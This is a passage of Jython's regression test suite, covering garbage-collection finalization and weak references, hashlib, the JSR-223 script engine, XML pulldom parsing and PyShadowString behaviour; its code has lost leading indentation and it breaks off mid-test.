# than waiting for the next gc run.
self.assertIn('del c', comments)
self.assertEqual(1, len(comments))
comments = []
self.assertNotEqual(gc.collect(), 0)
time.sleep(2)
self.assertIn('del a', comments)
self.assertEqual(1, len(comments))
comments = []
self.assertNotEqual(gc.collect(), 0)
time.sleep(2)
self.assertIn('del b', comments)
self.assertEqual(1, len(comments))
@unittest.skipUnless(test_support.is_jython,
'This class tests detailed Jython-specific behavior.')
class GCTests_Jy_Forced_Delayed_Finalization(unittest.TestCase):
# Here we basically reproduce the ordinary delayed finalization test, but ensure
# that the FORCE_DELAYED_FINALIZATION-flag does not cause regressions with this.
@classmethod
def setUpClass(cls):
#Jython-specific block:
try:
cls.savedJythonGCFlags = gc.getJythonGCFlags()
#the finalizer-related tests need this flag to pass in Jython:
gc.addJythonGCFlags(gc.DONT_FINALIZE_RESURRECTED_OBJECTS)
gc.addJythonGCFlags(gc.FORCE_DELAYED_FINALIZATION)
gc.stopMonitoring()
except Exception:
pass
@classmethod
def tearDownClass(cls):
try:
gc.setJythonGCFlags(cls.savedJythonGCFlags)
except Exception:
pass
# Tests from GCTests_Jy_preprocess_and_postprocess are repeated here
# without monitoring but with forced flag.
def test_forced_finalization_preprocess_and_postprocess(self):
# Note that this test is repeated here (it already appears in another class
# in this module) to check that everything still works as it should with
# a different flag context.
comments = []
self0 = self
class A:
def __del__(self):
self0.assertIn("run PreProcess", comments)
comments.append("A del")
# let's simulate a time-consuming finalizer
# to ensure that post finalization processing
# is sensitive to this
time.sleep(0.5)
comments.append("A del done")
class PreProcess(Runnable):
def run(self):
self0.assertEqual(comments, [])
comments.append("run PreProcess")
class PostProcess(Runnable):
def run(self):
self0.assertIn("run PreProcess", comments)
self0.assertIn("A del", comments)
self0.assertIn("A del done", comments)
comments.append("run PostProcess")
a = A()
a = None
prePr = PreProcess()
postPr = PostProcess()
time.sleep(1) # <- so that the newly registered processes do not
# become subject to a previous run
gc.registerPreFinalizationProcess(prePr)
gc.registerPostFinalizationProcess(postPr)
# Note that order matters here:
# If the flag gc.DONT_FINALIZE_RESURRECTED_OBJECTS is used,
# gc.registerPostFinalizationProcess(postPr, 0) would lead to failure,
# because postPr asserts that a's finalizer already ran. Since
# DONT_FINALIZE_RESURRECTED_OBJECTS also inserted a postprocess,
# to perform delayed finalization, the 0-index would prepend postPr
# before the process that actually runs the finalizers.
System.gc()
# we wait a bit longer here, since PostProcess runs asynchronously
# and must wait for the finalizer of A
time.sleep(2)
self.assertIn("run PostProcess", comments)
comments = []
gc.unregisterPreFinalizationProcess(prePr)
gc.unregisterPostFinalizationProcess(postPr)
def test_forced_with_extern_NonPyObjectFinalizer_that_notifies_gc(self):
comments = []
class A:
def __init__(self, index):
self.index = index
def __del__(self):
comments.append("A_del_"+str(self.index))
class PreProcess(Runnable):
preCount = 0
def run(self):
PreProcess.preCount += 1
class PostProcess(Runnable):
postCount = 0
def run(self):
PostProcess.postCount += 1
prePr = PreProcess()
postPr = PostProcess()
time.sleep(1) # <- so that the newly registered processes do not
# become subject to a previous run (remember: we
# are not in monitor mode, i.e. gc runs asynchronously)
gc.registerPreFinalizationProcess(prePr)
gc.registerPostFinalizationProcess(postPr)
for i in range(4):
f = A(i)
del f
#NastyFinalizer would cause this test occasionally to fail
externFinalizer = GCTestHelper.NotSoNastyFinalizer()
del externFinalizer
for i in range(4, 8):
f = A(i)
del f
System.gc()
# we wait a bit longer here, since PostProcess runs asynchronously
# and must wait for the finalizer of A
time.sleep(4)
self.assertEqual(len(comments), 8)
self.assertEqual(PreProcess.preCount, 1)
self.assertEqual(PostProcess.postCount, 1)
comments = []
gc.unregisterPreFinalizationProcess(prePr)
gc.unregisterPostFinalizationProcess(postPr)
def test_forced_delayedFinalization(self):
#time.sleep(2)
resurrect = []
comments = []
class Test_Finalizable(object):
def __init__(self, name):
self.name = name
def __repr__(self):
return "<"+self.name+">"
def __del__(self):
comments.append("del "+self.name)
class Test_Resurrection(object):
def __init__(self, name):
self.name = name
def __repr__(self):
return "<"+self.name+">"
def __del__(self):
comments.append("del "+self.name)
if hasattr(self, "toResurrect"):
resurrect.append(self.toResurrect)
a = Test_Finalizable("a")
a.b = Test_Finalizable("b")
c = Test_Resurrection("c")
c.a = a
c.toResurrect = Test_Finalizable("d")
del a
del c
self.assertNotEqual(gc.collect(), 0)
time.sleep(1)
# Note that CPython would collect a, b and c in one run.
# With gc.DONT_FINALIZE_RESURRECTED_OBJECTS set, Jython
# would not collect a and b in the same run as c,
# because a and b might have been resurrected by c, and
# Java offers no way to detect such resurrection other
# than waiting for the next gc run.
self.assertIn('del c', comments)
self.assertEqual(1, len(comments))
comments = []
self.assertNotEqual(gc.collect(), 0)
time.sleep(1)
self.assertIn('del a', comments)
self.assertEqual(1, len(comments))
comments = []
self.assertNotEqual(gc.collect(), 0)
time.sleep(1)
self.assertIn('del b', comments)
self.assertEqual(1, len(comments))
@unittest.skipUnless(test_support.is_jython,
'This class tests detailed Jython-specific behavior.')
class GCTests_Jy_Raw_Forced_Delayed_Finalization(unittest.TestCase):
@classmethod
def setUpClass(cls):
#Jython-specific block:
try:
cls.savedJythonGCFlags = gc.getJythonGCFlags()
#the finalizer-related tests need this flag to pass in Jython:
gc.stopMonitoring()
#gc.addJythonGCFlags(gc.VERBOSE_DELAYED)
except Exception:
pass
@classmethod
def tearDownClass(cls):
try:
gc.setJythonGCFlags(cls.savedJythonGCFlags)
except Exception:
pass
def test_raw_forced_delayedFinalization(self):
#print "test_raw_forced_delayedFinalization"
comments = []
class Test_JavaAbortFinalizable(Object):
def __init__(self, name, toAbort):
self.name = name
self.toAbort = toAbort
def __repr__(self):
return "<"+self.name+">"
def finalize(self):
gc.notifyPreFinalization()
comments.append("del "+self.name)
gc.abortDelayedFinalization(self.toAbort)
gc.notifyPostFinalization()
class Test_Finalizable(object):
def __init__(self, name):
self.name = name
def __repr__(self):
return "<"+self.name+">"
def __del__(self):
comments.append("del "+self.name)
def callback(obj):
comments.append("callback0")
a = Test_Finalizable("a")
wa = weakref.ref(a, callback)
b = Test_JavaAbortFinalizable("b", a)
gc.removeJythonGCFlags(gc.FORCE_DELAYED_WEAKREF_CALLBACKS)
gc.addJythonGCFlags(gc.FORCE_DELAYED_FINALIZATION)
self.assertTrue(gc.delayedFinalizationEnabled())
self.assertFalse(gc.delayedWeakrefCallbacksEnabled())
del a
del b
System.gc()
time.sleep(2)
self.assertIn('del b', comments)
self.assertEqual(2, len(comments))
self.assertIn('callback0', comments)
self.assertNotIn('del a', comments)
self.assertIsNone(wa())
gc.removeJythonGCFlags(gc.FORCE_DELAYED_FINALIZATION)
def test_raw_forced_delayedWeakrefCallback(self):
comments = []
resurrected = []
class Test_JavaResurrectFinalizable(Object):
def __init__(self, name, toResurrect):
self.name = name
self.toResurrect = toResurrect
def __repr__(self):
return "<"+self.name+">"
# Note that this type of finalizer is usually not recommended
# as it gets lost in case of resurrection.
def finalize(self):
gc.notifyPreFinalization()
comments.append("del "+self.name)
resurrected.append(self.toResurrect)
# We manually restore weak references:
gc.restoreWeakReferences(self.toResurrect)
gc.notifyPostFinalization()
class Test_Finalizable(object):
def __init__(self, name):
self.name = name
def __repr__(self):
return "<"+self.name+">"
def __del__(self):
comments.append("del "+self.name)
def callback(obj):
comments.append("callback")
a = Test_Finalizable("a")
b = Test_JavaResurrectFinalizable("b", a)
wa = weakref.ref(a, callback)
gc.removeJythonGCFlags(gc.FORCE_DELAYED_FINALIZATION)
gc.addJythonGCFlags(gc.FORCE_DELAYED_WEAKREF_CALLBACKS)
self.assertFalse(gc.delayedFinalizationEnabled())
self.assertTrue(gc.delayedWeakrefCallbacksEnabled())
self.assertEqual(len(comments), 0)
aStr = str(a)
del a
del b
System.gc()
time.sleep(2)
self.assertIn("del a", comments)
self.assertIn("del b", comments)
self.assertEqual(1, len(resurrected))
self.assertEqual(str(resurrected[0]), aStr)
self.assertIsNotNone(wa())
self.assertEqual(resurrected[0], wa())
self.assertNotIn("callback", comments)
self.assertEqual(2, len(comments))
gc.removeJythonGCFlags(gc.FORCE_DELAYED_WEAKREF_CALLBACKS)
def test_raw_forced_delayed(self):
comments = []
class Test_JavaAbortFinalizable(Object):
def __init__(self, name, toAbort):
self.name = name
self.toAbort = toAbort
def __repr__(self):
return "<"+self.name+">"
def finalize(self):
gc.notifyPreFinalization()
comments.append("del "+self.name)
gc.abortDelayedFinalization(self.toAbort)
# We manually restore weak references:
gc.restoreWeakReferences(self.toAbort)
gc.notifyPostFinalization()
class Test_Finalizable(object):
def __init__(self, name):
self.name = name
def __repr__(self):
return "<"+self.name+">"
def __del__(self):
comments.append("del "+self.name)
def callback_a(obj):
comments.append("callback_a")
def callback_b(obj):
comments.append("callback_b")
a = Test_Finalizable("a")
wa = weakref.ref(a, callback_a)
b = Test_JavaAbortFinalizable("b", a)
wb = weakref.ref(b, callback_b)
gc.addJythonGCFlags(gc.FORCE_DELAYED_FINALIZATION)
gc.addJythonGCFlags(gc.FORCE_DELAYED_WEAKREF_CALLBACKS)
self.assertTrue(gc.delayedFinalizationEnabled())
self.assertTrue(gc.delayedWeakrefCallbacksEnabled())
self.assertEqual(len(comments), 0)
del a
del b
System.gc()
time.sleep(2)
self.assertIsNotNone(wa())
self.assertIsNone(wb())
self.assertIn('del b', comments)
self.assertNotIn('callback_a', comments)
self.assertIn('callback_b', comments)
self.assertNotIn('del a', comments)
self.assertEqual(2, len(comments))
gc.removeJythonGCFlags(gc.FORCE_DELAYED_FINALIZATION)
gc.removeJythonGCFlags(gc.FORCE_DELAYED_WEAKREF_CALLBACKS)
@unittest.skipIf(__name__ != "__main__", 'Hangs under regrtest')
class GCTests_Jy_Monitoring(unittest.TestCase):
@classmethod
def setUpClass(cls):
#Jython-specific block:
try:
cls.savedJythonGCFlags = gc.getJythonGCFlags()
gc.setMonitorGlobal(True)
gc.addJythonGCFlags(gc.DONT_FINALIZE_RESURRECTED_OBJECTS)
# since the gc module already exists, it would not be caught by monitorGlobal,
# so we have to monitor it manually:
gc.monitorObject(gc)
# the finalizer-related tests need this flag to pass in Jython:
# gc.addJythonGCFlags(gc.DONT_FINALIZE_CYCLIC_GARBAGE)
except Exception:
pass
@classmethod
def tearDownClass(cls):
try:
gc.setJythonGCFlags(cls.savedJythonGCFlags)
gc.stopMonitoring()
except Exception:
pass
@unittest.skipUnless(test_support.is_jython, 'CPython has no monitor-state.')
def test_monitor_status_after_delayed_finalization(self):
resurrect = []
comments = []
class Test_Finalizable(object):
def __init__(self, name):
self.name = name
def __repr__(self):
return "<"+self.name+">"
def __del__(self):
comments.append("del "+self.name)
class Test_Resurrection(object):
def __init__(self, name):
self.name = name
def __repr__(self):
return "<"+self.name+">"
def __del__(self):
comments.append("del "+self.name)
if hasattr(self, "toResurrect"):
resurrect.append(self.toResurrect)
a = Test_Finalizable("a")
a.b = Test_Finalizable("b")
c = Test_Resurrection("c")
c.toResurrect = a
a.b.a = a
self.assertTrue(gc.isMonitored(a))
self.assertTrue(gc.isMonitored(a.b))
self.assertTrue(gc.isMonitored(c))
gc.collect()
del a
del c
#gc.set_debug(gc.DEBUG_SAVEALL)
self.assertEqual(gc.collect(), 0) #c is not cyclic and a, b are resurrected,
#so nothing to count here
#self.assertEqual(len(gc.garbage), 0)
# if we called gc.set_debug(gc.DEBUG_SAVEALL) above, it would
# be okay for gc.garbage to be empty, because a and b
# are not finalized and c is not cyclic.
self.assertEqual(comments, ['del c'])
self.assertEqual(str(resurrect), "[<a>]")
self.assertTrue(gc.isMonitored(resurrect[0]))
self.assertTrue(gc.isMonitored(resurrect[0].b))
def test_notifyRerun_for_delayed_finalization(self):
gc.collect()
comments = []
class Test_Finalizable(object):
def __init__(self, name):
self.name = name
def __repr__(self):
return "<"+self.name+">"
def __del__(self):
comments.append("del "+self.name)
a = Test_Finalizable("a")
lst = []
lst1 = [lst]
lst.append(lst1)
a.b = Test_Finalizable("b")
a.b.lst = lst
del lst
del lst1
try:
self.assertTrue(gc.isMonitored(a))
self.assertTrue(gc.isMonitored(a.b))
except AttributeError:
pass
del a
self.assertEqual(gc.collect(), 2) # only the cycle of the two lists is
# counted here; a and b are finalized but are not part of a cycle
self.assertEqual(comments, ['del a', 'del b'])
class GCTests_Jy_Weakref(unittest.TestCase):
@classmethod
def setUpClass(cls):
#Jython-specific block:
try:
cls.savedJythonGCFlags = gc.getJythonGCFlags()
gc.addJythonGCFlags(gc.PRESERVE_WEAKREFS_ON_RESURRECTION)
except Exception:
pass
@classmethod
def tearDownClass(cls):
try:
gc.setJythonGCFlags(cls.savedJythonGCFlags)
gc.stopMonitoring()
except Exception:
pass
def test_weakref_after_resurrection(self):
resurrect = []
comments = []
class Test_Finalizable(object):
def __init__(self, name):
self.name = name
def __repr__(self):
return "<"+self.name+">"
def __del__(self):
comments.append("del "+self.name)
class Test_Resurrection(object):
def __init__(self, name):
self.name = name
def __repr__(self):
return "<"+self.name+">"
def __del__(self):
comments.append("del "+self.name)
if hasattr(self, "toResurrect"):
resurrect.append(self)
def clb(ref):
comments.append("clb")
def clb2(ref):
comments.append("clb2 "+str(comments))
a = Test_Finalizable("a")
wa = weakref.ref(a, clb)
self.assertEqual(wa(), a)
c = Test_Resurrection("c")
c.toResurrect = a
wc = weakref.ref(c, clb2)
try:
gc.monitorObject(c)
except Exception:
pass
del a
del c
gc.collect()
self.assertIn('clb2 []', comments)
self.assertNotIn("clb", comments)
self.assertEqual(str(resurrect), "[<c>]")
self.assertEqual(str(wa()), "<a>")
self.assertEqual(wc(), None)
def test_weakref_after_resurrection_and_delayed_finalize(self):
resurrect = []
comments = []
class Test_Finalizable(object):
def __init__(self, name):
self.name = name
def __repr__(self):
return "<"+self.name+">"
def __del__(self):
comments.append("del "+self.name)
class Test_Resurrection(object):
def __init__(self, name):
self.name = name
def __repr__(self):
return "<"+self.name+">"
def __del__(self):
comments.append("del "+self.name)
if hasattr(self, "toResurrect"):
resurrect.append(self)
def clb(ref):
comments.append("clb")
def clb2(ref):
comments.append("clb2 "+str(comments))
a = Test_Finalizable("a")
wa = weakref.ref(a, clb)
self.assertEqual(wa(), a)
c = Test_Resurrection("c")
c.toResurrect = a
wc = weakref.ref(c, clb2)
try:
gc.monitorObject(c)
gc.addJythonGCFlags(gc.DONT_FINALIZE_RESURRECTED_OBJECTS)
except Exception:
pass
del a
del c
gc.collect()
self.assertIn('del c', comments)
self.assertNotIn('del a', comments)
self.assertIn('clb2 []', comments)
self.assertNotIn("clb", comments)
self.assertEqual(str(resurrect), "[<c>]")
self.assertEqual(str(wa()), "<a>")
self.assertEqual(wc(), None)
try:
gc.removeJythonGCFlags(gc.DONT_FINALIZE_RESURRECTED_OBJECTS)
except Exception:
pass
@unittest.skipUnless(test_support.is_jython, '')
def test_weakref_after_resurrection_threadsafe(self):
resurrect = []
comments = []
class Test_Finalizable(object):
def __init__(self, name):
self.name = name
def __repr__(self):
return "<"+self.name+">"
def __del__(self):
comments.append("del "+self.name)
class Test_Resurrection(object):
def __init__(self, name):
self.name = name
def __repr__(self):
return "<"+self.name+">"
def __del__(self):
comments.append("del "+self.name)
if hasattr(self, "toResurrect"):
resurrect.append(self)
a = Test_Finalizable("a")
wa = weakref.ref(a)
c = Test_Resurrection("c")
c.toResurrect = a
wc = weakref.ref(c)
del a
del c
try:
gc.addJythonGCFlags(gc.PRESERVE_WEAKREFS_ON_RESURRECTION)
System.gc()
# We intentionally don't wait here, but want to observe
# the situation with gc unfinished. Note that wa() preserves
# its result right away, due to the thread-safe implementation.
# Technically, the weak reference breaks and is restored after
# the gc run finishes. However, wa() blocks until the referent is
# restored or the deletion is confirmed.
except Exception:
pass
self.assertEqual(comments, [])
self.assertEqual(resurrect, [])
while comments == [] or resurrect == []:
self.assertEqual(str(wa()), '<a>')
self.assertEqual(wc(), None)
self.assertEqual(str(wa()), '<a>')
self.assertEqual(wc(), None)
@unittest.skipUnless(test_support.is_jython and test_support.get_java_version() < (9,),
"Test is specific to Java versions <9")
# From Java 9 onwards we get ugly warnings.
# See discussion in http://bugs.jython.org/issue2656
class GCTests_Jy_TraverseByReflection(unittest.TestCase):
@classmethod
def setUpClass(cls):
#Jython-specific block:
try:
cls.savedJythonGCFlags = gc.getJythonGCFlags()
gc.removeJythonGCFlags(gc.DONT_TRAVERSE_BY_REFLECTION) # i.e. enable ...
gc.addJythonGCFlags(gc.SUPPRESS_TRAVERSE_BY_REFLECTION_WARNING)
gc.setMonitorGlobal(True)
except Exception:
pass
@classmethod
def tearDownClass(cls):
try:
gc.setJythonGCFlags(cls.savedJythonGCFlags)
gc.stopMonitoring()
except Exception:
pass
def test_Field(self):
gc.collect()
prt = GCTestHelper.reflectionTraverseTestField()
del prt
self.assertEqual(gc.collect(), 1)
def test_List(self):
gc.collect()
prt = GCTestHelper.reflectionTraverseTestList()
del prt
self.assertEqual(gc.collect(), 1)
def test_Array(self):
gc.collect()
prt = GCTestHelper.reflectionTraverseTestArray()
del prt
self.assertEqual(gc.collect(), 1)
def test_PyList(self):
gc.collect()
prt = GCTestHelper.reflectionTraverseTestPyList()
del prt
self.assertEqual(gc.collect(), 2)
def test_Cycle(self):
gc.collect()
prt = GCTestHelper.reflectionTraverseTestCycle()
del prt
self.assertEqual(gc.collect(), 0)
@unittest.skipUnless(test_support.is_jython,
'''
The test involves Jython-specifics and is thus not supported by
non-Jython interpreters.
''')
class GCTests_Misc(unittest.TestCase):
# Test for issue 2337
def test_queue(self):
class X(object):
def __init__(self, q):
self.q = q
x = X(Queue())
gc.monitorObject(x)
gc.collect()
# Test for issue 2336
def test_gc_null(self):
WeakReferenceGC = Class.forName('org.python.modules.gc$WeakReferenceGC')
# We have to construct the right type ourselves; the constructor is protected
# and Jython doesn't expose it to us, so we'd get a plain WeakReference
# if we tried WeakReferenceGC()
con = WeakReferenceGC.getDeclaredConstructors()[0]
con.setAccessible(True)
x = object()
ref = con.newInstance(x)
# It works to start with
self.assertTrue(ref == ref)
self.assertTrue(ref.get() is x)
# Now clean up the referent
del x
while ref.get():
gc.collect()
self.assertIsNone(ref.get())
# Boom!
self.assertTrue(ref == ref)
def test_main():
tests = (
GCTests_Jy_CyclicGarbage,
GCTests_Jy_preprocess_and_postprocess,
GCTests_Jy_Delayed_Finalization,
GCTests_Jy_Forced_Delayed_Finalization,
GCTests_Jy_Raw_Forced_Delayed_Finalization,
GCTests_Jy_Monitoring,
GCTests_Jy_Weakref,
GCTests_Jy_TraverseByReflection,
GCTests_Misc,
)
test_support.run_unittest(*tests)
if __name__ == "__main__":
unittest.main()
```
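Every suite above saves, tweaks, and restores Jython's gc flags around its tests. A minimal sketch of that pattern on its own, assuming Jython's extended `gc` module:

```python
# Sketch only: the save/modify/restore pattern for Jython gc flags used in the
# setUpClass/tearDownClass methods above. Assumes Jython's gc module, which
# provides getJythonGCFlags/addJythonGCFlags/setJythonGCFlags and stopMonitoring.
import gc

saved_flags = gc.getJythonGCFlags()
try:
    gc.addJythonGCFlags(gc.DONT_FINALIZE_RESURRECTED_OBJECTS)
    gc.stopMonitoring()
    # ... run code whose finalization behaviour depends on the flag ...
finally:
    gc.setJythonGCFlags(saved_flags)  # restore the previous configuration
```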
#### File: Lib/test/test_hashlib_jy.py
```python
import hashlib
import unittest
from array import array
from test import test_support
class HashlibTestCase(unittest.TestCase):
def test_unicode(self):
self.assertEqual(hashlib.md5(u'foo').hexdigest(),
'acbd18db4cc2f85cedef654fccc4a4d8')
self.assertRaises(UnicodeEncodeError, hashlib.md5, u'Gráin amháiñ')
def test_array(self):
self.assertEqual(hashlib.sha1(array('c', 'hovercraft')).hexdigest(),
'496df4d8de2c71973d7e917c4fbe57e6ad46d738')
intarray = array('i', range(5))
self.assertEqual(hashlib.sha1(intarray).hexdigest(),
hashlib.sha1(intarray.tostring()).hexdigest())
def test_main():
test_support.run_unittest(HashlibTestCase)
if __name__ == '__main__':
test_main()
```
#### File: Lib/test/test_jsr223.py
```python
import unittest
import sys
from test import test_support
from javax.script import ScriptEngine, ScriptEngineManager
class JSR223TestCase(unittest.TestCase):
def test_factory(self):
engine = ScriptEngineManager().getEngineByName("python")
f = engine.factory
language_version = ".".join(str(comp) for comp in sys.version_info[0:2]) # such as "2.5"
impl_version = ".".join(str(comp) for comp in sys.version_info[0:3]) # such as "2.5.2"
self.assertNotEqual(f.scriptEngine, engine) # we don't pool engines
self.assertEqual(f.engineName, "jython")
self.assertEqual(f.engineVersion, impl_version)
self.assertEqual(set(f.extensions), set(['py']))
self.assertEqual(f.languageName, "python")
self.assertEqual(f.languageVersion, language_version)
self.assertEqual(set(f.names), set(["python", "jython"]))
self.assertEqual(set(f.mimeTypes), set(["text/python", "application/python", "text/x-python", "application/x-python"]))
# variants
self.assertEqual(f.getParameter(ScriptEngine.ENGINE), "jython")
self.assertEqual(f.getParameter(ScriptEngine.ENGINE_VERSION), impl_version)
self.assertEqual(f.getParameter(ScriptEngine.NAME), "jython")
self.assertEqual(f.getParameter(ScriptEngine.LANGUAGE), "python")
self.assertEqual(f.getParameter(ScriptEngine.LANGUAGE_VERSION), language_version)
self.assertEqual(f.getOutputStatement("abc"), "print u'abc'")
self.assertEqual(f.getProgram("x = 42", "y = 'abc'"), "x = 42\ny = 'abc'\n")
def test_main():
test_support.run_unittest(
JSR223TestCase)
if __name__ == "__main__":
test_main()
```
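The factory test above only introspects Jython's JSR-223 engine; a minimal sketch of actually evaluating Python source through it, assuming the standard `javax.script` API is on the classpath:

```python
# Sketch only: evaluating Python source through the JSR-223 engine obtained above.
# ScriptEngine.put and ScriptEngine.eval are standard javax.script methods.
from javax.script import ScriptEngineManager

engine = ScriptEngineManager().getEngineByName("python")
engine.put("x", 42)            # bind a variable into the engine's scope
print engine.eval("x + 1")     # evaluates in the engine and prints 43
```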
#### File: Lib/test/test_jython_initializer.py
```python
import os
import subprocess
import sys
import unittest
from test import test_support
WINDOWS = (os._name if test_support.is_jython else os.name) == 'nt'
class TestUsingInitializer(unittest.TestCase):
def test_syspath_initializer(self):
fn = test_support.findfile('check_for_initializer_in_syspath.py')
jar = test_support.findfile('syspath_initializer.jar')
env = dict(CLASSPATH=jar,
JAVA_HOME=sys.registry['java.home'],
PATH=os.environ.get('PATH', ''))
if WINDOWS:
# TMP is needed to give property java.io.tmpdir a sensible value
env['TMP'] = os.environ.get('TMP', '.')
# SystemRoot is needed to remote debug the subprocess JVM
env['SystemRoot'] = os.environ.get('SystemRoot', '')
self.assertEquals(0, subprocess.call([sys.executable, fn], env=env))
def test_main():
test_support.run_unittest(TestUsingInitializer)
if __name__ == "__main__":
test_main()
```
#### File: Lib/test/test_metaclass.py
```python
import unittest
from test import test_support
class MetaclassModuleTestCase(unittest.TestCase):
def test_module_attribute(self):
#Test for SF bug #1781500: wrong __module__ for classes with a metaclass
from test_metaclass_support.simpleclass import TestClass
self.assert_(TestClass.__module__.endswith('simpleclass'))
def test_main():
test_support.run_unittest(MetaclassModuleTestCase)
if __name__ == '__main__':
test_main()
```
#### File: Lib/test/test_pep263_jy.py
```python
import unittest
from test import test_support
class BadEncodingTest(unittest.TestCase):
def test_invalid_default(self):
self.assertRaises(SyntaxError, __import__, "test.latin1_no_encoding")
def test_invalid_declared_encoding(self):
self.assertRaises(SyntaxError, __import__, "test.invalid_utf_8_declared_encoding")
def test_main():
test_support.run_unittest(BadEncodingTest)
if __name__=="__main__":
test_main()
```
#### File: Lib/test/test_pulldom.py
```python
import StringIO
import unittest
from xml.dom import pulldom
from test import test_support
class UnicodeTests(unittest.TestCase):
testDoc = """\
<?xml version="1.0" encoding="ascii"?>
<document>
<p>Some greek: ΑΒΓΔΕ</p>
<greek attrs="ΖΗΘΙΚ"/>
<?greek ΛΜΝΞΟ?>
<!--ΛΜΝΞΟ-->
</document>
"""
def setUp(self):
self.testFile = StringIO.StringIO(self.testDoc)
def testTextNodes(self):
text = []
for event, node in pulldom.parse(self.testFile):
if event == pulldom.CHARACTERS:
text.append(node.data)
try:
result = u"".join(text)
self.failUnlessEqual(repr(result), r"u'\n Some greek: \u0391\u0392\u0393\u0394\u0395\n \n \n \n'")
except Exception, x:
self.fail("Unexpected exception joining text pieces: %s" % str(x))
def testAttributes(self):
attrText = []
for event, node in pulldom.parse(self.testFile):
if event == pulldom.START_ELEMENT:
for attrIx in range(node.attributes.length):
attrText.append(node.attributes.item(attrIx).value)
try:
result = u"".join(attrText)
self.failUnlessEqual(repr(result), r"u'\u0396\u0397\u0398\u0399\u039a'")
except Exception, x:
self.fail("Unexpected exception joining attribute text pieces: %s" % str(x))
def testProcessingInstruction(self):
piText = []
for event, node in pulldom.parse(self.testFile):
if event == pulldom.PROCESSING_INSTRUCTION:
piText.append(node.data)
try:
result = u"".join(piText)
# Weird how the repr for PI data is different from text and char data.
# Still, the whole xml.dom.* and xml.sax.* hierarchy is rather a
# labyrinthine mess under jython, mostly because it's so old, and
# yet survived through major evolutionary changes in both jython and java.
self.failUnlessEqual(repr(result), r"u'ΛΜΝΞΟ'")
except Exception, x:
self.fail("Unexpected exception joining pi data pieces: %s" % str(x))
def testComment(self):
commentText = []
for event, node in pulldom.parse(self.testFile):
if event == pulldom.COMMENT:
commentText.append(node.data)
try:
result = u"".join(commentText)
self.failUnlessEqual(repr(result), r"u'ΛΜΝΞΟ'")
except Exception, x:
self.fail("Unexpected exception joining comment data pieces: %s" % str(x))
def test_main():
test_support.run_unittest(__name__)
if __name__ == "__main__":
test_main()
```
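The pulldom tests above all follow the same pattern: iterate the event stream and collect node data matching one event type. A minimal standalone sketch of that loop, using only the standard-library `xml.dom.pulldom` API:

```python
# Sketch only: the event-filtering loop used by each test above, on an inline document.
# pulldom.parseString and the CHARACTERS event constant are standard-library API.
from xml.dom import pulldom

text = []
for event, node in pulldom.parseString("<doc><p>alpha</p><p>beta</p></doc>"):
    if event == pulldom.CHARACTERS:
        text.append(node.data)
print u"".join(text)   # u'alphabeta'
```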
#### File: Lib/test/test_shadowstr_jy.py
```python
import os
import sys
from test import string_tests
from test.test_support import run_unittest, is_jython
from test.test_str import StrTest
import unittest
from org.python.core import PyShadowString
# Ideally we would test shadowstr is a str but the tests need to sub-class it
class StrTestCase(
string_tests.CommonTest,
string_tests.MixinStrUnicodeUserStringTest,
string_tests.MixinStrUserStringTest,
):
# A PyShadowString should pass the tests for str too.
type2test = PyShadowString
class ShadowStrTestCase(unittest.TestCase):
def setUp(self):
self.ss = PyShadowString("hello", "bonjour")
# The Java class of a python module may be <module>$py
CCLASS = r"test\.test_shadowstr_jy\$py" # compiled (e.g. regrtest)
# Or it may be org.python.pycode._pyx<n>
PCLASS = r"org\.python\.pycode\._pyx\d+" # .py at the prompt
def check_first_eq(self):
self.assertTrue(self.ss == "hello")
self.assertFalse(self.ss == "bonjour")
self.assertTrue("hello" == self.ss)
self.assertFalse("bonjour" == self.ss)
# shadowstring-shadowstring comparisons
tt = PyShadowString("hello", "goodbye")
self.assertTrue(self.ss == tt) # primary==primary
tt = PyShadowString("adieu", "hello")
self.assertFalse(self.ss == tt) # primary==shadow
self.assertFalse(tt == self.ss) # shadow==primary
tt = PyShadowString("adieu", "bonjour")
self.assertFalse(self.ss == tt) # shadow==shadow
def check_both_eq(self):
self.assertTrue(self.ss == "hello")
self.assertTrue(self.ss == "bonjour")
self.assertTrue("hello" == self.ss)
self.assertTrue("bonjour" == self.ss)
# shadowstring-shadowstring comparisons
tt = PyShadowString("hello", "goodbye")
for c, m in self.ss.gettargets(): tt.addtarget(c, m)
self.assertTrue(self.ss == tt) # primary==primary
tt = PyShadowString("goodbye", "hello")
for c, m in self.ss.gettargets(): tt.addtarget(c, m)
self.assertTrue(self.ss == tt) # primary==shadow
self.assertTrue(tt == self.ss) # shadow==primary
tt = PyShadowString("adieu", "bonjour")
for c, m in self.ss.gettargets(): tt.addtarget(c, m)
self.assertTrue(self.ss == tt) # shadow==shadow
def test_eq(self):
# Test recognition unconditionally
self.check_first_eq()
self.ss.addtarget(None) # match any
self.check_both_eq()
def test_eq_class(self):
# Test recognition of class context only
self.check_first_eq()
self.ss.addtarget(self.CCLASS)
self.ss.addtarget(self.PCLASS)
self.check_both_eq()
def test_eq_method(self):
# Test recognition of method context only
self.check_first_eq()
# The Java method name of a python function is name$<n>
self.ss.addtarget(None, r"test_eq_method\$\d+") # method only
self.check_both_eq()
def test_eq_class_method(self):
# Test recognition of class and method context
self.check_first_eq()
# Match this method in this module
method = r"test_eq_class_method\$\d+"
self.ss.addtarget(self.CCLASS, method)
self.ss.addtarget(self.PCLASS, method)
self.check_both_eq()
def check_first_startswith(self):
self.assertTrue(self.ss.startswith("hel"))
self.assertFalse(self.ss.startswith("bon"))
def check_both_startswith(self):
self.assertTrue(self.ss.startswith("hel"))
self.assertTrue(self.ss.startswith("bon"))
def test_startswith(self):
# Test recognition unconditionally
self.check_first_startswith()
self.ss.addtarget(None) # match any
self.check_both_startswith()
def test_startswith_class(self):
# Test recognition of class context only
self.check_first_startswith()
self.ss.addtarget(self.CCLASS) # class only
self.ss.addtarget(self.PCLASS) # class only
self.check_both_startswith()
def test_startswith_method(self):
# Test recognition of method context only
self.check_first_startswith()
self.ss.addtarget(None, r"test_startswith_method\$\d+") # method only
self.check_both_startswith()
def test_startswith_class_method(self):
# Test recognition of class and method context
self.check_first_startswith()
# Match this method in this module
method = r"test_startswith_class_method\$\d+"
self.ss.addtarget(self.CCLASS, method)
self.ss.addtarget(self.PCLASS, method)
self.check_both_startswith()
def test_slice(self):
# Test slicing goes through to the constituent strings consistently
def check(m, n):
tt = self.ss[m:n]
self.assertEqual(tt, "hello"[m:n])
self.assertEqual(tt, "bonjour"[m:n])
self.assertEqual(self.ss.gettargets(), tt.gettargets())
# Match this method in this module
method = r"test_slice\$\d+"
self.ss.addtarget(self.CCLASS, method)
